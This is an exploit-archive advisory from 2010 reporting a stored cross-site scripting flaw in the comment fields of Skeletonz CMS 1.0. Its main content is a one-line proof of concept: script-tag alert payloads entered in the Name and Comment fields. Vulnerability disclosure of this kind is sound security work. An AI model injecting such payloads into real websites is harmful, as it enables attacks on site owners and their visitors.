Skeletonz CMS Permanent XSS Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Skeletonz CMS Permanent XSS Vulnerability
# Published : 2010-11-28
# Author : Jbyte
# Previous Title : Pandora FMS <= 3.1 SQL Injection
# Next Title : MemHT Portal 4.0.1 [user agent] Persistent Cross Site Scripting

# Exploit Title: Xss on skeletonz-simple dynamic cms in the section comments
# Google Dork: 
# Date: 27/11/10
# Author: Jordan Diaz aka Jbyte
# Software Link: http://orangoo.com/skeletonz/
# Version: 1.0
# Tested on: Windows xp
# CVE : 
The follow xss is located in the section of comments of the CMS skeletonz
Xss Exploit
field Name: <script>alert('xss');</script>field Comment: <script>alert('xss');</script>